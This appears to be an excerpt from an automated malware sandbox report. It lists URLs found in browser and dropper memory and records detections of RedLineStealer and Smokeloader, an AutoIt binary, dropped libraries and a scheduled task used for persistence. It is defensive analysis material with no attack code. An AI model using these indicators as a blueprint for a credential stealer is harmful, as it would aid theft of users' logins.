Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://truecolors.firefox.comnetwork.proxy.backup.socksbrowser.handlers.migrationshttps://screensho
Source: firefox.exe, 00000023.00000002.3311278425.00000132C41F0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3200954375.00000132C41FE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3304363170.00000132C3C88000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3316055038.000004E319904000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3207024753.00000132C41F0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3292910030.00000132BDD9B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3282517712.00000132BBDB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: firefox.exe, 00000023.00000002.3299612052.00000132C247C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3316055038.000004E319904000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6AE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://weibo.com/
Source: firefox.exe, 00000023.00000002.3300363667.00000132C2503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3299612052.00000132C247C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6AE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 00000023.00000002.3299612052.00000132C247C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.ca/
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3299612052.00000132C247C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.co.uk/
Source: firefox.exe, 00000023.00000002.3281670424.00000132BBAB4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3200954375.00000132C41FE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3316055038.000004E319904000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3207024753.00000132C41F0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3292910030.00000132BDD9B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3282517712.00000132BBDB2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3282517712.00000132BBD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/
Source: firefox.exe, 00000023.00000002.3240579668.00000132B60AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: firefox.exe, 00000023.00000002.3303203265.00000132C2B7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3258234904.00000132B9C70000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3125373422.00000132BA800000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3126717821.00000132BAA38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3127404594.00000132BAA8A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6A25000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 00000023.00000002.3302865830.00000132C279C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3279683763.00000132BB544000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3208780144.00000132C279C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozill
Source: firefox.exe, 00000023.00000002.3299612052.00000132C247C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.de/
Source: firefox.exe, 00000023.00000002.3299612052.00000132C247C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.fr/
Source: firefox.exe, 00000023.00000002.3299612052.00000132C247C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6AE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.avito.ru/
Source: firefox.exe, 00000023.00000002.3299612052.00000132C247C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bbc.co.uk/
Source: firefox.exe, 00000023.00000002.3240579668.00000132B60AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: firefox.exe, 00000023.00000002.3299612052.00000132C247C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.de/
Source: file.exe, 00000000.00000002.2604363979.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2952997493.0000000005609000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2953964028.0000000005606000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3119507696.00000000056A6000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3118840439.00000000056A9000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3119123250.00000000056A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: firefox.exe, 00000023.00000002.3298965968.00000132C23E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/
Source: firefox.exe, 00000023.00000002.3303203265.00000132C2B7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3181822524.00000132C25C5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3172041141.00000132C26B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3125373422.00000132BA800000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3126717821.00000132BAA38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3127404594.00000132BAA8A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: file.exe, 00000000.00000002.2604363979.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2952997493.0000000005609000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2953964028.0000000005606000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3119507696.00000000056A6000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3118840439.00000000056A9000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3119123250.00000000056A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/policies/privacy/
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/policies/privacy/startup
Source: firefox.exe, 00000023.00000002.3303203265.00000132C2B7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3258234904.00000132B9C70000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3125373422.00000132BA800000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3126717821.00000132BAA38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3208033913.00000132C3C66000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3127404594.00000132BAA8A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6A25000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3282517712.00000132BBDB2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3203625245.00000132BBDC0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3304363170.00000132C3C65000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3202991056.00000132C3C69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 00000023.00000002.3304363170.00000132C3CC4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3201091459.00000132C3CC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: firefox.exe, 00000023.00000002.3299612052.00000132C247C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3316055038.000004E319904000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6AE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 00000023.00000002.3299612052.00000132C247C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3316055038.000004E319904000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6AE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3299612052.00000132C247C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.leboncoin.fr/
Source: firefox.exe, 00000023.00000002.3304363170.00000132C3CD5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3242416997.00000132B618C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3201091459.00000132C3CE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3304363170.00000132C3CC0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3312097959.00000132C424D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3317501385.00003A0D98B04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3232903270.0000000CD927C000.00000004.00000010.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3201091459.00000132C3CD5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3245288155.00000132B690A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3242416997.00000132B6103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.2593553859.00000000002B4000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2593553859.0000000000295000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: firefox.exe, 00000023.00000002.3311278425.00000132C41E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3183823867.00000132C3F10000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3270548472.00000132BB365000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: file.exe, 00000000.00000002.2593553859.00000000002B4000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2593553859.0000000000295000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: firefox.exe, 00000023.00000002.3311278425.00000132C41E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000002.2593553859.00000000002B4000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2593553859.0000000000295000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.2481142057.000000000BB74000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3008632527.00000000056F0000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3211134500.000000000579B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3309555985.00000132C409F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3311278425.00000132C41E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: firefox.exe, 00000023.00000002.3311278425.00000132C41E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/resource:///modules/UrlbarResult.sys.mjsresource://gre/modules/P
Source: file.exe, 00000000.00000003.2481142057.000000000BB74000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3008632527.00000000056F0000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3211134500.000000000579B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3309555985.00000132C409F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3311278425.00000132C41E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000002.2593553859.00000000002B4000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2593553859.0000000000295000.00000040.00000001.01000000.00000003.sdmp, firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3240579668.00000132B605F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 00000023.00000002.3302490357.00000132C2703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-contentP
Source: firefox.exe, 00000023.00000002.3302490357.00000132C2703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/V
Source: file.exe, 00000000.00000003.2481142057.000000000BB74000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3008632527.00000000056F0000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3211134500.000000000579B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3311278425.00000132C41E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000002.2593553859.0000000000295000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3317907853.00003F4396A13000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3289593951.00000132BD2BD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com
Source: firefox.exe, 00000023.00000002.3299612052.00000132C247C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.olx.pl/
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3276641087.00000132BB475000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openh264.org/findUpdates()
Source: firefox.exe, 00000023.00000002.3281670424.00000132BBAB4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3200954375.00000132C41FE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3316055038.000004E319904000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3207024753.00000132C41F0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3282517712.00000132BBDB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 00000023.00000002.3317907853.00003F4396A13000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.tsn.ca
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.widevine.com/
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.widevine.com/get
Source: firefox.exe, 00000023.00000002.3299612052.00000132C247C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.wykop.pl/
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3304363170.00000132C3C88000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3316055038.000004E319904000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3281670424.00000132BBA64000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3292910030.00000132BDD9B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3282517712.00000132BBDB2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6AE2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3287630311.00000132BD1C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 00000023.00000002.3283630557.00000132BCB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warning
Source: firefox.exe, 00000023.00000002.3265189555.00000132BACA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warningThe
Source: firefox.exe, 00000023.00000003.3207024753.00000132C4166000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3304363170.00000132C3C39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3285902389.00000132BCFA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3260198511.00000132BA2D9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3311278425.00000132C4166000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3285902389.00000132BCFCE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com
Source: firefox.exe, 00000023.00000002.3259653895.00000132BA0B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3260198511.00000132BA2D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3237958152.00000132AA803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3285902389.00000132BCFA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3237958152.00000132AA86B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3237687669.00000132AA670000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3227805089.00000132C2790000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3242416997.00000132B61F0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3208033913.00000132C3C66000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3281670424.00000132BBA40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3237687669.00000132AA679000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6AE2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3304363170.00000132C3C65000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3202991056.00000132C3C69000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3276641087.00000132BB4D9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3285902389.00000132BCFCE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3240579668.00000132B6026000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000021.00000002.3106864860.0000022722417000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3121991377.0000029D80AD9000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3237687669.00000132AA679000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdAll
Source: firefox.exe, 00000023.00000002.3238991466.00000132AC4A7000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3238991466.00000132AC460000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RE
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdUse
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account_getBoundsWithoutFlushing.panel-header

System Summary

Source: 00000012.00000002.3325152088.0000000000F4C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000012.00000002.3323737933.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0d957dbf73.exe, 00000015.00000002.3187753102.0000000001042000.00000002.00000001.01000000.00000012.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_95d06786-c
Source: 0d957dbf73.exe, 00000015.00000002.3187753102.0000000001042000.00000002.00000001.01000000.00000012.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_81b54916-2
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: .idata
Source: JKECGDBFCB.exe.0.dr Static PE information: section name:
Source: JKECGDBFCB.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.14.dr Static PE information: section name:
Source: skotes.exe.14.dr Static PE information: section name: .idata
Source: random[1].exe.17.dr Static PE information: section name:
Source: random[1].exe.17.dr Static PE information: section name: .idata
Source: random[1].exe.17.dr Static PE information: section name:
Source: 815f2a8fe8.exe.17.dr Static PE information: section name:
Source: 815f2a8fe8.exe.17.dr Static PE information: section name: .idata
Source: 815f2a8fe8.exe.17.dr Static PE information: section name:
Source: random[2].exe0.17.dr Static PE information: section name:
Source: random[2].exe0.17.dr Static PE information: section name: .idata
Source: 57a07eec2d.exe.17.dr Static PE information: section name:
Source: 57a07eec2d.exe.17.dr Static PE information: section name: .idata
Source: random[1].exe0.17.dr Static PE information: section name:
Source: random[1].exe0.17.dr Static PE information: section name: .idata
Source: random[1].exe0.17.dr Static PE information: section name:
Source: 2533b4b8c7.exe.17.dr Static PE information: section name:
Source: 2533b4b8c7.exe.17.dr Static PE information: section name: .idata
Source: 2533b4b8c7.exe.17.dr Static PE information: section name:
Source: random[1].exe1.17.dr Static PE information: section name:
Source: random[1].exe1.17.dr Static PE information: section name: .idata
Source: random[1].exe1.17.dr Static PE information: section name:
Source: feb3d39b6a.exe.17.dr Static PE information: section name:
Source: feb3d39b6a.exe.17.dr Static PE information: section name: .idata
Source: feb3d39b6a.exe.17.dr Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C53B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C53B700
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C53B8C0 rand_s,NtQueryVirtualMemory, 0_2_6C53B8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C53B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C53B910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4DF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C4DF280
Source: C:\Users\user\Documents\JKECGDBFCB.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C5194D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C50CBE8 appears 134 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00D4DF80 appears 36 times
